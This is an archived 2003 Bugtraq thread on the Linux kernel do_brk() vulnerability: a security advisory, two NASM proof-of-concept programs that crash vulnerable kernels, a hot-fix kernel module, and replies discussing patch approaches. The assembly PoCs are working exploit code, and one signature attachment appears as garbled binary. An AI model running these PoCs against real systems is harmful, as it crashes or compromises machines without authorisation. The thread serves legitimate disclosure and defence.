11045808 2003-12-02 03:16 +0000 /89 rader/ Christophe Devine <DEVINE@iie.cnam.fr>
Importerad: 2003-12-02 17:59 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <30127>
Ärende: Linux kernel do_brk() proof-of-concept exploit code
------------------------------------------------------------
From: Christophe Devine <DEVINE@iie.cnam.fr>
To: bugtraq@securityfocus.com
Message-ID: <Pine.VMS.3.91-b11-vms.1031202031221.13520A-100000@speedy.iie.cnam.fr>
The following program can be used to test if a x86 Linux system
is vulnerable to the do_brk() exploit; use at your own risk.
$ nasm brk_poc.asm -o a.out
$ chmod 755 a.out
$ uname -a
Linux test3 2.4.22-10mdk #1 Thu Sep 18 12:30:58 CEST 2003 i686 unknown unknown GNU/Linux
$ ./a.out &
[1] 1698
$ cat /proc/`pidof a.out`/maps
bffff000-c0000000 rwxp 00000000 03:03 376860 /tmp/a.out
c0000000-c0003000 rwxp 00000000 00:00 0
(system reboots when the program exits)
$ uname -a
Linux test3 2.4.23 #1 Mon Dec 1 22:18:25 CET 2003 i686 unknown unknown GNU/Linux
$ ./a.out &
[1] 1591
$ cat /proc/`pidof a.out`/maps
bffff000-c0000000 rwxp 00000000 03:03 376860 /tmp/a.out
(the program exits gracefully)
$ cat brk_poc.asm
; ref.: http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html
BITS 32
org 0xBFFFF000
ehdr: ; Elf32_Ehdr
db 0x7F, "ELF", 1, 1, 1 ; e_ident
times 9 db 0
dw 2 ; e_type
dw 3 ; e_machine
dd 1 ; e_version
dd _start ; e_entry
dd phdr - $$ ; e_phoff
dd 0 ; e_shoff
dd 0 ; e_flags
dw ehdrsize ; e_ehsize
dw phdrsize ; e_phentsize
dw 1 ; e_phnum
dw 0 ; e_shentsize
dw 0 ; e_shnum
dw 0 ; e_shstrndx
ehdrsize equ $ - ehdr
phdr: ; Elf32_Phdr
dd 1 ; p_type
dd 0 ; p_offset
dd $$ ; p_vaddr
dd $$ ; p_paddr
dd filesize ; p_filesz
dd 0x4000 ; p_memsz
dd 7 ; p_flags
dd 0x1000 ; p_align
phdrsize equ $ - phdr
_start:
mov eax, 162
mov ebx, timespec
int 0x80
mov eax, 1
mov ebx, 0
int 0x80
timespec dd 20,0
filesize equ $ - $$
--
Christophe Devine - http://www.cr0.net:8040/about/
(11045808) /Christophe Devine <DEVINE@iie.cnam.fr>/-
Kommentar i text 11046081 av Calum <bugtraq@umtstrial.co.uk>
11046081 2003-12-02 17:21 +0000 /26 rader/ Calum <bugtraq@umtstrial.co.uk>
Importerad: 2003-12-02 19:43 av Brevbäraren
Extern mottagare: Christophe Devine <DEVINE@iie.cnam.fr>
Extern kopiemottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <30134>
Kommentar till text 11045808 av Christophe Devine <DEVINE@iie.cnam.fr>
Ärende: Re: Linux kernel do_brk() proof-of-concept exploit code
------------------------------------------------------------
From: Calum <bugtraq@umtstrial.co.uk>
To: Christophe Devine <DEVINE@iie.cnam.fr>
Cc: bugtraq@securityfocus.com
Message-ID: <200312021721.13324.bugtraq@umtstrial.co.uk>
On Tuesday 02 December 2003 3:16 am, Christophe Devine wrote:
> The following program can be used to test if a x86 Linux system
> is vulnerable to the do_brk() exploit; use at your own risk.
This POC code needs nasm greater than 0.98.36, otherwise you get the
following error when trying to compile it.
exploit@womble exploit $ nasm -v
NASM version 0.98.36 compiled on Jul 17 2003
exploit@womble exploit $ nasm brk_poc.asm -o a.out
brk_poc.asm:5: error: attempt to set a negative program origin
It works with 0.98.38.
--
The early bird may get the worm, but the second mouse gets the cheese.
http://gk.umtstrial.co.uk/~calum/
(11046081) /Calum <bugtraq@umtstrial.co.uk>/(Ombruten)
11046011 2003-12-02 00:26 +0100 /138 rader/ Paul Starzetz <ihaquer@isec.pl>
Importerad: 2003-12-02 19:08 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Extern kopiemottagare: vendor-sec <vendor-sec@lst.de>
Extern kopiemottagare: vulnwatch@vulnwatch.org
Externa svar till: security@isec.pl
Mottagare: Bugtraq (import) <30131>
Ärende: [iSEC] Linux kernel do_brk() lacks argument bound checking
------------------------------------------------------------
From: Paul Starzetz <ihaquer@isec.pl>
To: bugtraq@securityfocus.com
Cc: vendor-sec <vendor-sec@lst.de>, <vulnwatch@vulnwatch.org>
Message-ID: <Pine.LNX.4.44.0312020005180.31975-100000@isec.pl>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Synopsis: Linux kernel do_brk() lacks argument bound checking
Product: Linux
Version: up to 2.4.23, others
Vendor: http://www.kernel.org/
URL: http://isec.pl/vulnerabilities/isec-0012-do_brk.txt
CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0961
Author: Paul Starzetz <ihaquer@isec.pl>
Wojciech Purczynski <cliph@isec.pl>
Date: December 1, 2003
Issue:
======
Critical security bug has been discovered in the Linux kernel within
do_brk() function that may lead to full compromise of vulnerable
system.
Details:
========
The physical memory of a x86 machine running one of the recent Linux
kernels is managed in a simplified flat memory model. Each user
process may address a memory ranging from 0 up to TASK_SIZE
bytes. Memory above this limit is not accessible to the user and
contains kernel code with its data structures. User process is
divided into logical sections, called virtual memory areas. The
kernel keeps tracks and manages user process's virtual memory areas
to provide proper memory management and memory protection faults
handling. More details of Linux memory management are out of the
scope of this article and can be found in [3].
The do_brk() is an internal kernel function that is called indirectly
to manage process's memory heap (brk), growing or shrinking it
accordingly. It is simplified version of mmap(2) system call that
only handles anonymous mappings (i.e. not initialized data). The
function lacks of bound checks of its parameters and may be exploited
to create arbitrary large virtual memory area, exceeding user
accessible memory limit. Thus, the kernel memory above this limit may
become part of user process's memory as visible to the kernel memory
manager.
Typical memory layout of user process may look like:
bash$ cat /proc/self/maps
08048000-0804c000 r-xp 00000000 03:02 207935 /bin/cat
0804c000-0804d000 rw-p 00003000 03:02 207935 /bin/cat
0804d000-0804e000 rwxp 00000000 00:00 0
40000000-40015000 r-xp 00000000 03:02 207495 /lib/ld-2.3.2.so
40015000-40016000 rw-p 00014000 03:02 207495 /lib/ld-2.3.2.so
40016000-40017000 rw-p 00000000 00:00 0
40020000-40021000 rw-p 00000000 00:00 0
42000000-4212f000 r-xp 00000000 03:02 319985 /lib/tls/libc-2.3.2.so
4212f000-42132000 rw-p 0012f000 03:02 319985 /lib/tls/libc-2.3.2.so
42132000-42134000 rw-p 00000000 00:00 0
bfffe000-c0000000 rwxp fffff000 00:00 0
The do_brk() function is called from within ELF and a.out loaders as
well as from brk(2) syscall. These are three different vectors which
may be used to exploit do_brk() bug. After successful exploitation
process memory may contain a large memory mapping, i.e.:
080a5000-c891d000 rwxp 00000000 00:00 0
Impact:
=======
Successful exploitation of do_brk() leads to full compromise of
vulnerable system, including gaining full uid 0 privileges,
possibility of kernel code and data structures modification as well
as kernel-level (ring0) code execution.
Tested and successfully exploited kernel versions include:
o 2.4.20-18.9 as shipped with RedHat 9.0
o 2.4.22 (vanila)
o 2.4.22 with grsecurity patch
There is no known reliable workaround for this vulnerability
except. We recommend upgrading to the most recent kernel version (so
far the 2.4.23 kernel) on all vulnerable systems.
Limiting maximum size of user process's data segment with ulimit -d
command provides some workaround for exploit based on brk system call.
However, there are at least two other attack vectors that can not be
disabled without patching the system.
We have succesfully created proof-of-concept exploit. Unfortunately we
guess that our exploit may have leaked to the underground.
Credits:
========
Paul Starzetz <ihaquer@isec.pl> has indenpendently discovered the bug,
Wojciech Purczynski <cliph@isec.pl> invented and provided numerous
techniques to automatically and efficiently exploit the bug.
References:
===========
[1] Intel Architecture Software Developer's Manual Volume 2
"Instruction Set Reference"
[2] Intel Architecture Software Developer's Manual Volume 3
"System Programming Guide"
[3] Daniel P. Bovet, Marco Cesati,
"Understanding the Linux Kernel"
- --
Paul Starzetz
iSEC Security Research
http://isec.pl/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)
iD8DBQE/y8jRC+8U3Z5wpu4RAnHvAKDEC0/e5xr7s61wMSsr4XUDl5+S8ACfQTqe
CsfpNtUMoLW7xDS22JSAJP0=
=dpRp
-----END PGP SIGNATURE-----
(11046011) /Paul Starzetz <ihaquer@isec.pl>/(Ombruten)
11056205 2003-12-04 16:35 +0100 /23 rader/ Julien TINNES <julien@cr0.org>
Importerad: 2003-12-04 20:42 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <30180>
Ärende: Linux kernel do_brk(), another proof-of-concept code for i386
------------------------------------------------------------
From: Julien TINNES <julien@cr0.org>
To: bugtraq@securityfocus.com
Message-ID: <200312041635.43654.julien@cr0.org>
There were complains that previous POC wasn't working on some
kernels, and I even saw a guy on IRC asking about POC using a
different method.
The previous version was relying on the Linux ELF loader to call
do_brk for us. This one uses sys_brk(), but to bypass a check of
available memory in sys_brk we still have to map our code high in
memory (but not past PAGE_OFFSET this time).
To be able to call sys_brk with success we had to make sure the stack
was'nt above our program (in most case we have to move it).
Then you can easily crash your system (do a fork(), clone(),
execve()...), doing something else is'nt trivial :p
Use NASM 0.98.38 or higher to compile.
Julien TINNES
(11056205) /Julien TINNES <julien@cr0.org>/(Ombruten)
Bilaga (text/plain) i text 11056206
11056206 2003-12-04 16:35 +0100 /101 rader/ Julien TINNES <julien@cr0.org>
Bilagans filnamn: "brk_poc_sys_brk.asm"
Importerad: 2003-12-04 20:42 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <30181>
Bilaga (text/plain) till text 11056205
Ärende: Bilaga (brk_poc_sys_brk.asm) till: Linux kernel do_brk(), another proof-of-concept code for i386
------------------------------------------------------------
; Christophe Devine (devine at cr0.net) and Julien Tinnes (julien at cr0.org)
;
; This exploit uses sys_brk directly to expand his break and doesn't rely
; on the ELF loader to do it.
;
; To bypass a check in sys_brk against available memory, we use a high
; virtual address as base address
;
; In most case (let's say when no PaX w/ ASLR :) we have to move the stack
; so that we can expand our break
;
BITS 32
org 0xBFFF0000
ehdr: ; Elf32_Ehdr
db 0x7F, "ELF", 1, 1, 1 ; e_ident
times 9 db 0
dw 2 ; e_type
dw 3 ; e_machine
dd 1 ; e_version
dd _start ; e_entry
dd phdr - $$ ; e_phoff
dd 0 ; e_shoff
dd 0 ; e_flags
dw ehdrsize ; e_ehsize
dw phdrsize ; e_phentsize
dw 2 ; e_phnum
dw 0 ; e_shentsize
dw 0 ; e_shnum
dw 0 ; e_shstrndx
ehdrsize equ $ - ehdr
phdr: ; Elf32_Phdr
dd 1 ; p_type
dd 0 ; p_offset
dd $$ ; p_vaddr
dd $$ ; p_paddr
dd filesize ; p_filesz
dd filesize ; p_memsz
dd 7 ; p_flags
dd 0x1000 ; p_align
phdrsize equ $ - phdr
_start:
; ** Make sure the stack is not above us
mov eax, 163 ; mremap
mov ebx, esp
and ebx, ~(0x1000 - 1) ; align to page size
mov ecx, 0x1000 ; we suppose stack is one page only
mov edx, 0x9000 ; be sure it can't get mapped after
; us
mov esi,1 ; MREMAP_MAYMOVE
int 0x80
and esp, (0x1000 - 1) ; offset in page
add esp, eax ; stack ptr to new location
; nb: we don't fix
; pointers so environ/cmdline
; are not available
mov eax,152 ; mlockall (for tests as root)
mov ebx,2 ; MCL_FUTURE
int 0x80
; get VMAs for the kernel memory
mov eax,45 ; brk
mov ebx,0xC0500000
int 0x80
mov ecx, 4
loop0:
mov eax, 2 ; fork
int 0x80
loop loop0
_idle:
mov eax,162 ; nanosleep
mov ebx,timespec
int 0x80
jmp _idle
timespec dd 10,0
filesize equ $ - $$
(11056206) /Julien TINNES <julien@cr0.org>/---------
11060599 2003-12-05 00:04 +0100 /37 rader/ Paul Starzetz <paul@isec.pl>
Importerad: 2003-12-05 20:23 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Extern mottagare: vulnwatch@vulnwatch.org
Extern mottagare: full-disclosure@lists.netsys.com
Externa svar till: security@isec.pl
Mottagare: Bugtraq (import) <30194>
Ärende: [iSEC] Linux kernel do_brk() vulnerability details
------------------------------------------------------------
From: Paul Starzetz <paul@isec.pl>
To: bugtraq@securityfocus.com, <vulnwatch@vulnwatch.org>,
<full-disclosure@lists.netsys.com>
Message-ID: <Pine.LNX.4.44.0312042358340.26831-100000@isec.pl>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hi,
We have released a paper covering technical details of the do_brk()
bug and the results of our research done while writing the exploit
code. It also describes the numerous techniques we have used to
create a very effective exploit code that leads to full privilege
escalation even on systems running a kernel secured with various
security patches.
It can be found at: http://isec.pl/papers/linux_kernel_do_brk.pdf
Regards,
- --
Paul Starzetz
iSEC Security Research
http://isec.pl/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)
iD8DBQE/z7vdC+8U3Z5wpu4RAkP0AKDH0sNST6CjjTmIfGTSETSAa922hgCfR3mz
tSWdaV41pn1zznrPb/8lQtA=
=VOlJ
-----END PGP SIGNATURE-----
(11060599) /Paul Starzetz <paul@isec.pl>/-(Ombruten)
11060606 2003-12-04 15:41 -0800 /176 rader/ <canon@nersc.gov>
Importerad: 2003-12-05 20:27 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <30195>
Ärende: Hot fix for do_brk bug
------------------------------------------------------------
From: canon@nersc.gov
To: bugtraq@securityfocus.com
Message-ID: <200312042341.hB4Nfbmd005154@pookie.nersc.gov>
Greetings,
I've written a linux kernel module that can be used to hot fix a
Linux system for the bug in do_brk. It scans the
kernel space and replaces jmp and calls to do_brk
to point to a wrapper routine instead. It also maps
the symbol table to point to the wrapper. This only
works on x86 and it has only been tested with RH kernels
2.4.18-27.7.xsmp and 2.4.20-20.7smp. It is quite possible
this could crash or screw-up a system, so use at your own
risk. I've tested the module against the proof of concept code
written and posted by Christophe Devine. The module catches
the exploit and logs the attempt.
--Shane Canon
------brk_fix.c------------
#define MODULE
#define __KERNEL__
/* some constants used in our module */
#define MODULE_NAME "brk_fix"
#define MODULE_VERSION "0.01"
/* brk_fix
* Verions: 0.01
*
* WARNING WARNING WARNING
* This module intentionally modifies kernel memory.
* This module could potentially crash or damage your system.
* Use at your own risks.
*
* Hot fix for integer overflow in do_brk
*
* This module scans kernel code space looking for jumps and calls
* to do_brk. It then changes these calls to instead call my_brk,
* which is a wrapper routine that does some checks before calling do_brk.
* The module also scans for the address of do_brk and replaces it
* with my_brk. This would mainly occur in the exported symbols table.
*
* This has been tested with RH 2.4.20-20.7smp and RH 2.4.18-27.7.xsmp on i686
*
* Sample use...
* gcc -O3 -I/lib/modules/`uname -r`/build/include -c -o brk_fix.o brk_fix.c
* insmod ./brk_fix.o
*
* Written by Shane Canon <canon@nersc.gov>
* (c) Copyright 2003 Regents of the University of California
* All rights reserved.
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/
#include <linux/kernel.h>
#include <linux/errno.h>
#include <linux/version.h>
#include <linux/module.h>
#include <linux/slab.h>
extern void * __start___kallsyms;
#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,4,9)
#ifdef MODULE_LICENSE
MODULE_LICENSE("GPL");
#endif
#endif
unsigned long my_brk(unsigned long addr, unsigned long len);
int init_module(void)
{
unsigned char *ptr;
unsigned char *newptr;
long *lptr;
unsigned char *cptr;
long diff;
int count=0;
unsigned char *start=(unsigned char *) (TASK_SIZE); /* Start at the
beginning of kernel space */
unsigned char *end=(unsigned char *)&__start___kallsyms;
/* Want something that is well
past the kernel test */
/* This seems to fit the bill
*/
ptr=(unsigned char *)(do_brk); /* We are looking for
calls/jumps to this function */
newptr=(unsigned char *)(my_brk); /* This is what we will change
it to */
for (cptr=start;cptr<end;cptr++){ /* Lets scan all of kernel space
*/
if (*cptr==0xe8||*cptr==0xe9){ /* Look for calls or jumps
*/
cptr++; /* If you find one look at the
next dword */
lptr=(long *)cptr;
cptr+=4;
if ((cptr+*lptr)==(ptr)){ /* See if the offset would point
to do_brk */
printk("fixing 0x%08lx\n",lptr); /* If so, change it to our new
routine */
*lptr=(newptr-cptr);
count++;
}
}
else{
lptr=(long *)cptr; /* Look for the address as well.
This would show */
if ((unsigned char*)(*lptr)==ptr){ /* up in the symbol table.
*/
printk("Fixing address at 0x%08lx\n",lptr);
*lptr=(long)(newptr);
}
}
}
printk ("Fix brk installed..\n"); /* All done. */
MOD_INC_USE_COUNT; /* We can't unload this one. So
lets inc the mod */
/* count and leave it there. */
return 0; /* success */
}
void cleanup_module(void)
{
/* Can't remove it */
}
/* These are the first couple of lines from the patched mmap.c */
/* Do the new checks and then call the original do_brk */
unsigned long my_brk(unsigned long addr, unsigned long len)
{
len = PAGE_ALIGN(len);
if (!len)
return addr;
if ((addr + len) > TASK_SIZE || (addr + len) < addr){ /* Let's make
sure its in bounds */
printk("caught do_brk exploit!!!\n");
return -EINVAL;
}
return do_brk(addr,len); /* Call the real
do_brk */
}
-------end---------
------------------------------------------------------------------------
Shane Canon
National Energy Research Scientific
Computing Center
------------------------------------------------------------------------
(11060606) /<canon@nersc.gov>/----------------------
Kommentar i text 11061107 av Goetz Babin-Ebell <babin-ebell@trustcenter.de>
11061107 2003-12-05 22:31 +0100 /37 rader/ Goetz Babin-Ebell <babin-ebell@trustcenter.de>
Importerad: 2003-12-05 23:45 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <30219>
Kommentar till text 11060606 av <canon@nersc.gov>
Ärende: Re: Hot fix for do_brk bug
------------------------------------------------------------
From: Goetz Babin-Ebell <babin-ebell@trustcenter.de>
To: bugtraq@securityfocus.com
Message-ID: <3FD0F92F.6090909@trustcenter.de>
Hello Shane,
canon@nersc.gov wrote:
> I've written a linux kernel module that can be used to hot fix a
> Linux system for the bug in do_brk. It scans the
> kernel space and replaces jmp and calls to do_brk
> to point to a wrapper routine instead. It also maps
> the symbol table to point to the wrapper. This only
> works on x86 and it has only been tested with RH kernels
> 2.4.18-27.7.xsmp and 2.4.20-20.7smp. It is quite possible
> this could crash or screw-up a system, so use at your own
> risk. I've tested the module against the proof of concept code
> written and posted by Christophe Devine. The module catches
> the exploit and logs the attempt.
It would be less intrusive to the kernel to supply a fixed do_brk()
and replace the do_brk with a jump to your version.
This way you only have to touch one place
in the kernel space (and no guesswork, no modify
of kernel data that might look like a pointer to do_brk()
but is really something else...)
Bye
Goetz
--
Goetz Babin-Ebell, TC TrustCenter AG, http://www.trustcenter.de
Sonninstr. 24-28, 20097 Hamburg, Germany
Tel.: +49-(0)40 80 80 26 -0, Fax: +49-(0)40 80 80 26 -126
(11061107) /Goetz Babin-Ebell <babin-ebell@trustcenter.de>/
Bilaga (application/x-pkcs7-signature) i text 11061108
Kommentar i text 11061140 av Gunnar Wolf <gwolf@gwolf.cx>
Kommentar i text 11070717 av =?ISO-8859-2?Q?Pavel_harry=5Fx_Pal=E1t?= <harry_x@babylon5.cz>
11061108 2003-12-05 22:31 +0100 /14 rader/ Goetz Babin-Ebell <babin-ebell@trustcenter.de>
Bilagans filnamn: "smime.p7s"
Importerad: 2003-12-05 23:45 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <30220>
Bilaga (application/x-pkcs7-signature) till text 11061107
Ãrende: Bilaga (smime.p7s) till: Re: Hot fix for do_brk bug
------------------------------------------------------------
0Â� *ÂHÂ÷
��� Â0Â���1�0 ��+������0Â� *ÂHÂ÷
����� Â�Â0Â�D0Â� �������Â�����NBÃ#��÷¥0
� *ÂHÂ÷
�����0¼1�0 ��U����DE1�0���U����Hamburg1�0���U����Hamburg1:08��U�
�1TC TrustCenter for Security in Data Networks GmbH1"0 ��U����TC TrustCenter Class 3 CA1)0'� *ÂHÂ÷
� ���certificate@trustcenter.de0��
030210144250Z�
040210144250Z0ª1�0 ��U����DE1�0���U����Hamburg1�0���U����Hamburg1�0���U�
��TC TrustCenter AG1�0���U����Entwicklung1�0���U����Goetz Babin-Ebell1)0'� *ÂHÂ÷
� ���babin-ebell@trustcenter.de0�"0
� *ÂHÂ÷
���������0�
�Â���°ziÃz�(k¤�Ãä¥uqäQ 0(�|öÂÃh�ÂÂÃÂÃù�n!ÂÃ$ç©ÂÂ+Âuú-zÃ+�Â
þ[!�áëTûKæà ,lÂ
Jèì$ý3ÃîÃásX�aåáFò>F� Âý�/ÃFÃ$ÂÃX|Â2ÿÂÂ�n�ÂÂ�?«ÃLD�èæÃ
él+g¤âü�}Hìÿ?Tq©Âsú"¡rÃÃÃ-ªçÃ5ÂRó�rs¯&zÂwNPø¡�áF�ç5(Y,gUlr�é+(�Aà ýR-·Â
Â�£ôÂ� ì¢T«ï~�£Â�ÂÂÃ�·mÂÂÃÃÃ��õ4u��Ã¥ÃÂðÃBÂ+áÂð+¼ÂÃÂ&;ÃÂ
£�����£ÂÃ0ÂÃ0���U����ÿ��0�0���U����ÿ�����à 0>� `ÂH�ÂøB���1�/http://www.trustcenter.de/guidelines/index.html0�� `ÂH�ÂøB������� 0]� `ÂH�ÂøB���P�Nhttps://www.trustcenter.de/cgi-bin/check-rev.cgi/901E000000024E42ED231207F7A5?0
� *ÂHÂ÷
������ÂÂ�9³°¸!FÃy¼)¼ÂZIë�ªÃ`�%�Ã�³ðº ÂÃÂÂp¼è>òo!¸ªÃæÂÂ@Â=��Ã�°ÃVÃA
,#_hîSrPÂaìÃÃÂÃy�ª�ÂÃ#µ�~=ÃÃÂÂdÃÃaä
Ã�-Ã
¯<¡n:XÂ�S¾{�֊�¹peÂ$¯HîB0Â�D0Â� �������Â�����NBÃ#��÷¥0
� *ÂHÂ÷
�����0¼1�0 ��U����DE1�0���U����Hamburg1�0���U����Hamburg1:08��U�
�1TC TrustCenter for Security in Data Networks GmbH1"0 ��U����TC TrustCenter Class 3 CA1)0'� *ÂHÂ÷
� ���certificate@trustcenter.de0��
030210144250Z�
040210144250Z0ª1�0 ��U����DE1�0���U����Hamburg1�0���U����Hamburg1�0���U�
��TC TrustCenter AG1�0���U����Entwicklung1�0���U����Goetz Babin-Ebell1)0'� *ÂHÂ÷
� ���babin-ebell@trustcenter.de0�"0
� *ÂHÂ÷
���������0�
�Â���°ziÃz�(k¤�Ãä¥uqäQ 0(�|öÂÃh�ÂÂÃÂÃù�n!ÂÃ$ç©ÂÂ+Âuú-zÃ+�Â
þ[!�áëTûKæà ,lÂ
Jèì$ý3ÃîÃásX�aåáFò>F� Âý�/ÃFÃ$ÂÃX|Â2ÿÂÂ�n�ÂÂ�?«ÃLD�èæÃ
él+g¤âü�}Hìÿ?Tq©Âsú"¡rÃÃÃ-ªçÃ5ÂRó�rs¯&zÂwNPø¡�áF�ç5(Y,gUlr�é+(�Aà ýR-·Â
Â�£ôÂ� ì¢T«ï~�£Â�ÂÂÃ�·mÂÂÃÃÃ��õ4u��Ã¥ÃÂðÃBÂ+áÂð+¼ÂÃÂ&;ÃÂ
£�����£ÂÃ0ÂÃ0���U����ÿ��0�0���U����ÿ�����à 0>� `ÂH�ÂøB���1�/http://www.trustcenter.de/guidelines/index.html0�� `ÂH�ÂøB������� 0]� `ÂH�ÂøB���P�Nhttps://www.trustcenter.de/cgi-bin/check-rev.cgi/901E000000024E42ED231207F7A5?0
� *ÂHÂ÷
������ÂÂ�9³°¸!FÃy¼)¼ÂZIë�ªÃ`�%�Ã�³ðº ÂÃÂÂp¼è>òo!¸ªÃæÂÂ@Â=��Ã�°ÃVÃA
,#_hîSrPÂaìÃÃÂÃy�ª�ÂÃ#µ�~=ÃÃÂÂdÃÃaä
Ã�-Ã
¯<¡n:XÂ�S¾{�֊�¹peÂ$¯HîB1Â�w0Â�s���0ÂÃ0¼1�0 ��U����DE1�0���U����Hamburg1�0���U����Hamburg1:08��U�
�1TC TrustCenter for Security in Data Networks GmbH1"0 ��U����TC TrustCenter Class 3 CA1)0'� *ÂHÂ÷
� ���certificate@trustcenter.de���Â�����NBÃ#��÷¥0 ��+������ Â�{0�� *ÂHÂ÷
� �1�� *ÂHÂ÷
���0�� *ÂHÂ÷
� �1��
031205213127Z0#� *ÂHÂ÷
� �1���ÂÂÃ�=²3ôã Ã�)(8&?4ÂÂ0R� *ÂHÂ÷
� �1E0C0
��*ÂHÂ÷
��0���*ÂHÂ÷
�����Â0
��*ÂHÂ÷
����@0���+����0
��*ÂHÂ÷
����(0Âá� +����Â7��1ÂÃ0ÂÃ0¼1�0 ��U����DE1�0���U����Hamburg1�0���U����Hamburg1:08��U�
�1TC TrustCenter for Security in Data Networks GmbH1"0 ��U����TC TrustCenter Class 3 CA1)0'� *ÂHÂ÷
� ���certificate@trustcenter.de���Â�����NBÃ#��÷¥0Âã��*ÂHÂ÷
� ���1ÂàÂÃ0¼1�0 ��U����DE1�0���U����Hamburg1�0���U����Hamburg1:08��U�
�1TC TrustCenter for Security in Data Networks GmbH1"0
��U����TC TrustCenter Class 3
CA1)0'�
*ÂHÂ÷
�
���certificate@trustcenter.de���Â�����NBÃ#��÷¥0
�
*ÂHÂ÷
������Â��2�*,b�¡?|Ãâ�Âó9¤ö1k�Âà �ÂÂNÂ;O9ÂìjÃ<þ�-W$�%~Ãò¦ÃSBÂuK�Ã0°YÃÃ��MPq¯ÂCÂõdoEÃ3
!ó%I�R�+ü�kÃ¥E£ã¾Â¾`Â(®ÂëÃÂ�Âà @'å½rQ3¡P±a�ÂÃ7Âø½�?â¿ðä/ãqÃ>à ÂÂ)ÂðÃ[Bà >ù9ÂnÃÂüª¤��/¼ÃÃ¥�-�ýsl�¸W�C%n·Âô�áÂ'Â�7ðd�´ÿÃÃ'²³)4�Ã#=cä��ê��éÃÃ*¯q�,;KÂ���
m¦�bTBvB&Q<ÃÃzÂÃû¥W%&ÃF�
*!������
(11061108) /Goetz Babin-Ebell <babin-ebell@trustcenter.de>/(Ombruten)
11061140 2003-12-05 16:41 -0600 /45 rader/ Gunnar Wolf <gwolf@gwolf.cx>
Importerad: 2003-12-05 23:53 av Brevbäraren
Extern mottagare: Goetz Babin-Ebell <babin-ebell@trustcenter.de>
Extern kopiemottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <30221>
Kommentar till text 11061107 av Goetz Babin-Ebell <babin-ebell@trustcenter.de>
Ärende: Re: Hot fix for do_brk bug
------------------------------------------------------------
From: Gunnar Wolf <gwolf@gwolf.cx>
To: Goetz Babin-Ebell <babin-ebell@trustcenter.de>
Cc: bugtraq@securityfocus.com
Message-ID: <20031205224124.GM4654@gwolf.cx>
Goetz Babin-Ebell dijo [Fri, Dec 05, 2003 at 10:31:27PM +0100]:
> >I've written a linux kernel module that can be used to hot fix a
> >Linux system for the bug in do_brk. It scans the
> >kernel space and replaces jmp and calls to do_brk
> >to point to a wrapper routine instead. It also maps
> >the symbol table to point to the wrapper. This only
> >works on x86 and it has only been tested with RH kernels
> >2.4.18-27.7.xsmp and 2.4.20-20.7smp. It is quite possible
> >this could crash or screw-up a system, so use at your own
> >risk. I've tested the module against the proof of concept code
> >written and posted by Christophe Devine. The module catches
> >the exploit and logs the attempt.
>
> It would be less intrusive to the kernel to supply a fixed do_brk()
> and replace the do_brk with a jump to your version.
>
> This way you only have to touch one place
> in the kernel space (and no guesswork, no modify
> of kernel data that might look like a pointer to do_brk()
> but is really something else...)
Not only that - In order to be really effective, the hotfix would
require to remain active and check each module loaded into the kernel,
as modules might point to the real do_brk() call. Yes, it becomes
_much_ harder for an intruder to exploit it, but the patch is not
perfect.
...But anyway, it is quite welcome, a very valuable work. Of course,
the only way out of troubles is to install a new kernel. Sadly, many
people handle uptimes as pissing contests and disregard updating their
systems.
Greetings,
--
Gunnar Wolf - gwolf@gwolf.cx - (+52-55)5630-9700 ext. 1366
PGP key 1024D/8BB527AF 2001-10-23
Fingerprint: 0C79 D2D1 2C4E 9CE4 5973 F800 D80E F35A 8BB5 27AF
(11061140) /Gunnar Wolf <gwolf@gwolf.cx>/-----------
11070717 2003-12-06 19:51 +0100 /28 rader/ =?ISO-8859-2?Q?Pavel_harry=5Fx_Pal=E1t?= <harry_x@babylon5.cz>
Importerad: 2003-12-08 18:18 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <30227>
Kommentar till text 11061107 av Goetz Babin-Ebell <babin-ebell@trustcenter.de>
Ärende: Re: Hot fix for do_brk bug
------------------------------------------------------------
From: =?ISO-8859-2?Q?Pavel_harry=5Fx_Pal=E1t?= <harry_x@babylon5.cz>
To: bugtraq@securityfocus.com
Message-ID: <Pine.LNX.4.58.0312061927050.7490@orodruina.lan>
> It would be less intrusive to the kernel to supply a fixed do_brk()
> and replace the do_brk with a jump to your version.
I've written similar patch few days ago. The patch only modifies
first instructions of do_brk() (it replaces them with jmp to function
in LKM. It can be downloaded from http://wizard.ath.cx/fixbrk.tar.gz
But beware, I wrote it in rush and it's pretty odly written :-) But
it worked on my two servers (both were running 2.4.21 kernel with
grsecurity patch).
Greetings
Pavel Palát
--
Pavel "harry_x" Palát
harry_x@babylon5.cz
irc: #mistral.cz on IRCnet
The only way of finding the limits to the possible is by going beyond them to the impossible
Arthur C. Clark
(11070717) /=?ISO-8859-2?Q?Pavel_harry=5Fx_Pal=E1t?= <harry_x@babylon5.cz>/(Ombruten)
Kommentar i text 11076067 av Mariusz Woloszyn <emsi@ipartners.pl>
